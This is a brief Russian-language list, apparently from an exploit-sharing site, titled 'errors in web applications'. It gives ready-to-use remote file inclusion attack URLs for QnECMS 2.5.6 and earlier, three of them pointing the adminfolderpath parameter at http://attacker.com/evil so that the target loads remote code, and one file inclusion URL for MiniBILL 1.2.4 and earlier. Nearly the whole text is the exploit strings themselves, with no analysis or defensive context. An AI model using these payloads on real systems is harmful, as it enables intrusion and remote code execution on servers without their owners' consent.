Ошибки в веб-приложениях

1. QnECMS <= 2.5.6 (adminfolderpath) Remote File Inclusion Exploit
http://www.target.com/[path]/admin/include/footermain.php?adminfolderpath=http://attacker.com/evil?
http://www.target.com/[path]/photogallery/headerscripts.php?adminfolderpath=http://attacker.com/evil?
http://www.target.com/[path]/templates/headermain.php?adminfolderpath=http://attacker.com/evil?

2. MiniBILL <= 1.2.4
http://[host]/[script_path]/include/menu_builder.php?config[page_dir]=[file]